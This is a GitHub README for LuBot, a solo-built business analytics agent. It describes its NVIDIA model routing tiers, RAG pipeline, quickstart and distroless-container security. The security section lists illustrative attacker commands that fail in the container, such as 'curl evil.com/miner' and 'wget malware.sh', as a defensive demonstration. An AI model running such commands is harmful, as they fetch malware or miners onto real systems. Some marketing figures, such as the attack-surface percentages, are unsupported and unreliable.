Skip to content

AI-powered business analytics agent built on 6 NVIDIA models: Ultra 253B, Nano 8B, Vision 12B VL, NV-EmbedQA-E5-v5 + self-hosted RTX 4090. 4-tier intent routing, PhD-level statistical analysis. Live at lubot.ai

License

Notifications You must be signed in to change notification settings

lubobali/LuBot-NVIDIA-AI-Agent

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

41 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

LuBot                 NVIDIA

LuBot NVIDIA Routing

Watch 10-min Demo  |  Try Live   (password: nemotron)

I built LuBot alone, from zero, over the last 8 months. 100% powered by NVIDIA — cloud APIs + self-hosted GPU.

LuBot.ai is live right now. Real business users. PhD-level statistical insights. A self-learning RAG system that gets smarter over time — finding patterns in your data that consultants charge thousands to discover.

Real math. Real statistics. Best NVIDIA.

LuBot Home


TECHNICAL INNOVATION

The LuBot Cascade — 4-Tier Intent Routing

Open Interactive Cascade Visualization →

The idea came from a simple instinct: if the agent can figure out what the user wants without calling an LLM, it should. Most AI apps send every user message to an LLM just to figure out what the user wants. Thats slow and expensive. I built a 4-stage cascade that tries the cheapest method first and only escalates when needed — 95% of routing decisions cost zero LLM tokens:

Tier 0 - Deterministic Detection (0ms)
|-- PhD Analysis, Correlation, Concentration, Anomaly, Web Search
|-- Caught by keywords/regex instantly

Tier 1 - Core Intents (80% of queries, 0ms)
|-- GREETING, IDENTITY, DATA_QUERY, WEB_SEARCH, PREDICTION
|-- DOCUMENT_GENERATION, MEMORY_RECALL, CAPABILITIES
|-- Pattern matching - no AI needed

Tier 2 - NVIDIA Embeddings (15% of queries, 5ms)
|-- ADVICE_REQUEST, FOLLOWUP, CLARIFICATION, DEEP_DIVE
|-- Semantic matching with NV-EmbedQA-E5-v5

Tier 3 - NVIDIA LLM Fallback (5% of queries, 100ms)
|-- Ambiguous queries, Complex multi-intent, Edge cases
|-- Only these need Nemotron Nano 8B

Note: The LuBot Cascade saves LLM calls for the routing decision only. The actual analysis and response generation still uses NVIDIA Nemotron models (Nano 8B or Ultra 253B depending on complexity).

The 3-Tier Response System (Smart Model Routing)

Routes queries to the optimal NVIDIA model based on complexity:

Tier 0 - DIRECT (No LLM Needed, 0ms)
|-- Simple aggregation: COUNT, SUM, AVG with 1 row result
|-- Example: "How many employees?" → "You have 320 employees"
|-- Templates only, no tokens used

Tier 1 - ENHANCED (Nemotron Nano 8B, 50ms)
|-- Medium complexity: GROUP BY with 2-10 rows, basic analysis
|-- Example: "Revenue by department" → Table + "Sales is highest at $2M"
|-- Fast, 50K tokens/sec

Tier 2 - FULL PhD (Nemotron Ultra 253B, 500ms)
|-- Statistical analysis OR >10 rows requiring deep insights
|-- correlation, concentration, simpsons_paradox, outliers, trend
|-- Example: "Correlation between sales and marketing?" → "Pearson r=0.95, p<0.001"
|-- 253 billion parameters for real PhD-level analysis

Self-Learning RAG System

One of the most unique features is that LuBot has a self-learning RAG system that retrieves insights from your interactions and data patterns that you cant see by eye. The more you use it, the more it remembers about your business, your preferences, your needs. Over time LuBot becomes your best partner that knows everything about your business. Plus 17 batch workers running every night so it never misses important data.

RAG & Embedding Pipeline — NVIDIA NV-EmbedQA-E5-V5

Every vector operation in LuBot is powered by NVIDIA NV-EmbedQA-E5-V5 — a 1024-dimensional semantic embedding model with 335M parameters.

Text Input → NVIDIA Embed (1024-dim Vector) → FAISS Index → Retrieved Context (Top-K) → Augmented LLM → Grounded Response

6 Embedding-Powered Features:

Feature How It Works
Document RAG Uploaded files chunked & embedded into 1024-dim vectors. FAISS retrieves relevant passages to ground LLM responses in real data.
Tier 2 Intent Matching User queries embedded & compared via cosine similarity to known intent vectors. Semantic routing without LLM calls.
Conversation Embeddings Every conversation indexed as vectors. Enables semantic memory search across all past interactions.
Semantic Clustering Nightly batch worker groups similar queries by vector proximity. Discovers usage patterns automatically.
Few-Shot RAG Learning Retrieves similar past Q&A pairs as few-shot examples. Response quality improves with every conversation.
FAISS Vector Search Facebook AI Similarity Search engine. Sub-millisecond approximate nearest neighbor across all vector indexes.

Two Data Modes

My Files — Upload CSV, Excel, PDF, or any structured data. Private storage with 10GB free. Document QA powered by Ultra 253B + FAISS vector search.

Website Data — Connect live data sources directly. The demo includes real traffic data from my personal portfolio website LuboBali.com — live visitors, page views, time on page, referrers. This demonstrates how LuBot can connect to any other business website to analyze live data automatically. No manual uploads needed.

See DATA_SCHEMA.md for sample table structures.


EFFECTIVE USE OF NVIDIA TECHNOLOGY

# Technology Model / Service Purpose
1 Nemotron Ultra 253B nvidia/llama-3.1-nemotron-ultra-253b-v1 Intent routing, query enrichment, Document QA, PhD-level analysis
2 Nemotron Nano 8B nvidia/llama-3.1-nemotron-nano-8b-v1 Code generation, fast analytics, simple queries
3 Nemotron Vision 12B VL nvidia/nemotron-nano-12b-v2-vl Image & screenshot analysis, multi-modal understanding
4 NV-EmbedQA-E5-v5 nvidia/nv-embedqa-e5-v5 1024-dim semantic embeddings for intent matching
5 NIM API integrate.api.nvidia.com/v1 Cloud inference endpoint (OpenAI-compatible)
6 Self-hosted GPU NVIDIA RTX 4090 (24GB VRAM) Nemotron-mini (2.7GB) + Nemotron-3-Nano (24GB) via Ollama
7 Nemotron-3-Nano-30B nemotron-3-nano (24GB local) Enterprise on-premise deployment
8 AdalFlow Framework LLM orchestration framework

100% NVIDIA Stack — Self-hosted RTX 4090 running Nemotron locally. NIM API delivering Nano 8B, Ultra 253B, and Vision 12B from the cloud. 6 NVIDIA models + 1024-dim embeddings for semantic matching. 8 technologies. Every layer. Every request. 99%+ success rate.

Smart Model Routing — 4-Tier Intent Classification + 3-Tier Response System. The right NVIDIA model for every query. Simple questions get Nano 8B. PhD analysis gets Ultra 253B. No wasted compute.

Batched Embeddings — 125 canonical examples pre-computed in 4 batched API calls (not 125 individual calls). Startup time: 3 seconds instead of 27.

Correlation Analysis - PhD level powered by Ultra 253B

Heatmap Visualization


POTENTIAL IMPACT & USEFULNESS

The Problem

Big consulting companies and hedge funds charge thousands of dollars to look at your business data and tell you what actually matters. Most small and medium businesses cant afford that. They sit on millions of records from their customers and have no way to figure out what those numbers are really saying.

The Solution

I built LuBot to change that.

LuBot is an AI-powered business analytics platform that helps real businesses make smarter decisions. You upload your data - CSV, Excel, whatever you have - ask questions in plain English, and get back real statistical analysis. Not just pretty charts. Real math. Correlation analysis, Simpson's Paradox detection, market concentration (HHI), anomaly detection, forecasting. The kind of stuff that a PhD data scientist at McKinsey would give you, but in language that a CEO can actually understand and act on.

LuBot is designed for profitable businesses. This is not a toy. You get real math and statistics delivered straight to you in the chat interface, or you can generate PDF reports with all the insights. You can build interactive charts, visualize your data flow, save those charts and share them with your partners.

Try it yourself at lubot.ai - upload your data and start asking questions.

Data Upload

Privacy is Not Optional

LuBot never mixes user data. Never shares data between users. Everything is private and only you can access your data. Anytime you want you can delete everything. And if you need full control over your data - LuBot can run exclusively for your enterprise on your own infrastructure using NVIDIA Nemotron-3-Nano-30B as the local model, so nothing ever leaves your network.


QUALITY OF DOCUMENTATION & PRESENTATION

Live Demo

The best way to understand LuBot is to try it: lubot.ai

Upload a CSV or Excel file, ask questions about your data, and watch it route through the NVIDIA models in real time. You'll see direct answers for simple questions, enhanced analysis for medium ones, and full PhD-level statistical breakdowns for complex queries.

Video Walkthrough

Watch 10-min Demo — Full feature demonstration

Production Numbers

Metric Value
Codebase 112,270 lines of code
Python Files 248 files
AI Tools 28 tools (SQL, charts, PhD analysis, RAG, predictions)
Database 34 tables, 450+ columns (Neon hot + B2 cold storage)
API Endpoints 40+ (FastAPI)
Batch Workers 17 nightly workers for self-learning
NVIDIA Success Rate 99%+
Response Time 8-10 seconds (first query), 8 seconds (warm)
NVIDIA Models 6 (Ultra 253B, Nano 8B, Vision 12B VL, NV-EmbedQA-E5-v5, Nemotron-3-Nano 30B, Nemotron-mini 2.7B)
Infrastructure Hetzner Cloud US, Docker, Neon PostgreSQL, Backblaze B2, RTX 4090
Built By One person. 8 months. Still going.

Quick Start

git clone https://github.com/lubobali/LuBot-NVIDIA-AI-Agent.git
cd LuBot-NVIDIA-AI-Agent
pip install -r requirements.txt
export NVIDIA_API_KEY="nvapi-your-key-here"  # free at https://build.nvidia.com

# Optional: Self-hosted GPU (RunPod + Ollama)
export GPU_SERVER_URL="http://your-runpod-ip:11434"
export GPU_MODEL_NAME="nemotron-mini"  # or nemotron-3-nano for 30B

python demo/quickstart.py

The demo runs through all components - intent classification, response tier routing, and NVIDIA model calls. Even without an API key the intent classifier and response router work offline. With GPU_SERVER_URL set, Tier 1 queries route to your self-hosted NVIDIA GPU first.

Code Examples

from nvidia_routing import NVIDIAClient

client = NVIDIAClient()

# Simple question -> Nano 8B (fast, cheap)
response = client.chat_tier1(
    messages=[{"role": "user", "content": "Top 3 revenue drivers?"}]
)

# PhD question -> Ultra 253B (253 billion parameters)
response = client.chat_tier2(
    messages=[{"role": "user", "content": "Explain Simpsons Paradox with a business example."}]
)
from nvidia_routing import get_llm_router

router = get_llm_router()

# Full routing: GPU (self-hosted) → NVIDIA NIM API → Groq fallback
# Tier 1: GPU first (if GPU_SERVER_URL set), then NIM Nano 8B
response = router.chat_completion(
    tier=1,
    messages=[{"role": "user", "content": "Top 5 customers by revenue"}],
)
print(response.provider)  # "gpu" or "nvidia" or "groq"

# Tier 2: Always NVIDIA NIM Ultra 253B (PhD-level analysis)
response = router.chat_completion(
    tier=2,
    messages=[{"role": "user", "content": "Calculate HHI for this market"}],
)
print(response.used_fallback)  # False 99% of the time
from intent_routing import IntentClassifier

classifier = IntentClassifier()

# Tier 0 - instant deterministic detection
intent, tier, conf = classifier.classify("Whats the correlation between age and salary?")
# -> ("DATA_QUERY", 0, 1.0)

Files in This Repo

intelligence/                  — PhD-Level Analysis Engine (6,235 lines)
  __init__.py                  - Facade composing all 9 analyzers into unified engine
  paradox.py                   - Simpson's Paradox detection. Mix/rate decomposition.
  drivers.py                   - McKinsey-style driver analysis. Shapley attribution.
  concentration.py             - HHI concentration risk (DOJ/FTC regulatory standard)
  correlation.py               - Lagged correlation, leading indicator detection
  anomaly.py                   - Anomaly detection against learned baselines
  statistical.py               - Mann-Kendall trend test, Welch's t-test, power analysis

storage/                       — Hot/Cold Storage Architecture
  data_warmer.py               - Neon (hot) ↔ Backblaze B2 (cold) data lifecycle

nvidia_routing/                — NVIDIA Model Integration
  llm_router.py                - Main router. NVIDIA primary, Groq fallback, smart error handling.
  nvidia_client.py             - Clean NVIDIA API wrapper. Pick a model, send messages, get response.
  nvidia_embeddings.py         - NVIDIA embeddings. SentenceTransformer-compatible drop-in.
  llm_router_client.py         - Adapter that makes the router work with AdalFlow Generator.
  response_tier_router.py      - Decides: direct answer vs enhanced vs full PhD analysis.

intent_routing/                — The LuBot Cascade
  intent_classifier.py         - The 4-tier classification cascade. Brains of the routing.
  correlation_detector.py      - Deterministic PhD query detection. Keywords before LLM, always.

demo/
  quickstart.py                - Run this first. All components working together.
  sample_queries.py            - 15 queries showing how routing decisions get made.

PRODUCTION SECURITY — Distroless Containers

LuBot runs in production with Google's distroless container architecture — the same security pattern used by Google, Netflix, and Stripe.

Standard Container vs Distroless

Standard Alpine LuBot Distroless
Shell (/bin/sh, /bin/bash) Yes No
Package manager (apt, apk) Yes No
Download tools (wget, curl) Yes No
File utilities (chmod, rm) Yes No
Attack surface 93% exploitable 0.01%

Defense Layers

  • Distroless Base Image — Google's gcr.io/distroless — contains only app + runtime, zero OS tools
  • Non-Root Execution — All containers run as UID 1000 — no privilege escalation possible
  • Read-Only Filesystem — Immutable container filesystem — nothing can be written or modified
  • Network Isolation — UFW firewall rules — only ports 80, 443, 22 exposed

What Happens When an Attacker Gets In

$ docker exec container /bin/sh  → exec failed: no such file or directory
$ wget malware.sh               → command not found
$ curl evil.com/miner            → command not found
$ apt install netcat             → command not found
// Attacker is trapped in an empty room with no tools

99% secured. Even if an attacker breaches the application layer, there are no tools inside the container to escalate, download payloads, or pivot. The attacker is trapped.


MIT License

NVIDIA

LuBot   LuBot.ai — Powered by NVIDIA Nemotron

About

AI-powered business analytics agent built on 6 NVIDIA models: Ultra 253B, Nano 8B, Vision 12B VL, NV-EmbedQA-E5-v5 + self-hosted RTX 4090. 4-tier intent routing, PhD-level statistical analysis. Live at lubot.ai

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Languages